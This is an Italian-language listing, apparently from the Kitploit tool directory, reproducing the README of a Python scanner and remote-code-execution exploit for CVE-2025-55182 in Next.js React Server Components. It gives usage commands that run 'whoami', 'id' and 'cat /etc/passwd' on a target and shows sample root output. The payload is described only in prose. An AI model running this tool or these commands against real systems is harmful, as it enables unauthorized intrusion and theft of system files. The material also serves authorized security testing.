Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei **React Server Components (RSC)** nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE. | Kitploit
Strumenti/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
Scanner di VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei **React Server Components (RSC)** nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE.

Vedi Repository
169 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RSC Detector - Scanner di vulnerabilità dei React Server Components

Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei React Server Components (RSC) nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE.

⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre un'autorizzazione scritta prima di effettuare test.


Funzionalità

✅ Rilevamento passivo - Analizza HTML, header e struttura delle pagine per individuare indicatori RSC
✅ Fingerprinting attivo - Invia header specifici RSC per rilevare le risposte del server
✅ Analisi degli header HTTP - Identifica gli header relativi a Next.js e RSC
✅ Sfruttamento RCE - Esegue comandi su server vulnerabili (se sfruttabile)
✅ Output colorato nel terminale - Feedback visivo migliorato per una migliore leggibilità
✅ Modalità interattiva - Esegui più comandi in modalità di sfruttamento
✅ Decodifica robusta - Gestisce payload compressi gzip e payload binari


Installazione

Prerequisiti

  • Python 3.8+
  • pip (gestore di pacchetti Python)

Configurazione

  1. Clona il repository

    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Installa le dipendenze

    pip install -r requirements.txt
    

    Pacchetti richiesti:

    • requests>=2.28.0 - Libreria client HTTP
    • urllib3>=1.26.0 - Utility HTTP avanzate
    • colorama>=0.4.6 - Colori del terminale (compatibile con Windows)
    • beautifulsoup4 - Parsing HTML

Utilizzo

Rilevamento di base (senza sfruttamento)

python rsc_detector.py https://example.com

Scansione completa con sfruttamento

python rsc_detector.py https://example.com --exploit

Esegui un comando specifico

python rsc_detector.py https://example.com --exploit --cmd "whoami"

Modalità di sfruttamento interattiva

python rsc_detector.py https://example.com --exploit

Quindi inserisci i comandi al prompt (digita quit per uscire).


Opzioni della riga di comando

OpzioneDescrizione
<URL>URL del target (obbligatorio). Antepone automaticamente https:// se mancante
--exploitAbilita lo sfruttamento RCE dopo il rilevamento
--cmd <command>Esegue un comando specifico (da usare con --exploit)

Esempi

Rileva la vulnerabilità RSC:

python rsc_detector.py https://target.com

Sfrutta ed esegui il comando id:

python rsc_detector.py https://target.com --exploit --cmd "id"

Sfrutta ed esegui il comando cat /etc/passwd:

python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

Modalità interattiva (più comandi):

python rsc_detector.py https://target.com --exploit

Come funziona

1. Scansione passiva

  • Verifica la presenza del marcatore window.__next_f (Next.js App Router)
  • Rileva il Content-Type text/x-component
  • Cerca i marcatori del React Flight Protocol
  • Analizza __NEXT_DATA__ e le importazioni Next.js

2. Analisi degli header

  • Esamina gli header Server, Vary e X-Nextjs-Cache
  • Identifica se il server supporta RSC negli header HTTP

3. Fingerprinting attivo

  • Invia richieste con header RSC: 1
  • Analizza la risposta del server agli header specifici RSC
  • Rileva la struttura del React Flight Protocol

4. Sfruttamento RCE

  • Costruisce payload JSON dannosi che sfruttano la serializzazione dei React Server Component
  • Invia dati multipart/form-data per attivare l'esecuzione di codice lato server
  • Decodifica l'output dei comandi codificato in base64
  • Supporta risposte compresse gzip

Output e risultati

Risultati del rilevamento

[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

Output dello sfruttamento

[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

Dettagli della vulnerabilità

CVE-2025-55182 sfrutta:

  • React Server Component (RSC): difetti di serializzazione
  • Next.js Server Action: vulnerabilità di deserializzazione
  • Object prototype pollution tramite payload dannosi
  • Iniezione di comandi tramite child_process.execSync()

Superficie di attacco

  • Applicazioni Next.js che utilizzano App Router
  • Server Components con input controllati dall'utente
  • Applicazioni con RSC abilitato ma non adeguatamente validato

Linee guida legali ed etiche

⚠️ Importante

Questo strumento è RIGOROSAMENTE RISERVATO A TEST DI SICUREZZA AUTORIZZATI:

  1. ✅ DA FARE: Usa su sistemi di tua proprietà o con autorizzazione scritta al test
  2. ✅ DA FARE: Segnala le vulnerabilità in modo responsabile al fornitore
  3. ✅ DA FARE: Segui le pratiche di divulgazione responsabile
  4. ❌ DA NON FARE: Usare su sistemi senza autorizzazione
  5. ❌ DA NON FARE: Usare per scopi dannosi
  6. ❌ DA NON FARE: Archiviare o eseguire dati sensibili

L'accesso non autorizzato a sistemi informatici è illegale ai sensi di:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act 1990 - UK
  • Leggi simili nella maggior parte dei paesi

Divulgazione responsabile

Se scopri una vulnerabilità utilizzando questo strumento:

  1. NON divulgarla pubblicamente finché il fornitore non ha applicato la patch
  2. Contatta direttamente il team di sicurezza del fornitore
  3. Concedi 90 giorni per lo sviluppo della patch
  4. Coordina con il fornitore i tempi della divulgazione
  5. Accreditati negli advisory dopo la divulgazione

Risoluzione dei problemi

Errori del certificato SSL

Lo strumento ignora la verifica SSL per impostazione predefinita. Per abilitarla:

detector = RSCDetector(url, verify_ssl=True)

Errori di decodifica Base64

Lo strumento automaticamente:

  • Aggiunge padding alle stringhe base64 malformate
  • Rileva e decomprime i payload gzip
  • Ripiega sui caratteri di sostituzione UTF-8 per i dati binari

Nessuna chiave "digest" nella risposta

  • Il target potrebbe non essere vulnerabile
  • Il server potrebbe filtrare il payload dell'exploit
  • Prova test manuali o endpoint diversi

Problemi di timeout

Aumenta il timeout nel codice:

response = self.session.get(self.url, timeout=30)  # 30 seconds

Struttura del progetto

CVE-2025-55182/
├── README.md                # This file
├── requirements.txt         # Python dependencies
├── rsc_detector.py         # Main scanner & exploit engine
├── rsc_cli.py              # CLI utilities (if present)
├── script.py               # Additional scripts (if present)
├── COLOR_GUIDE.md          # Color output documentation
└── .gitignore              # Git ignore rules

Dipendenze

requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)

Installa tutto in una volta:

pip install -r requirements.txt

Suggerimenti per le prestazioni

Scarica lo strumento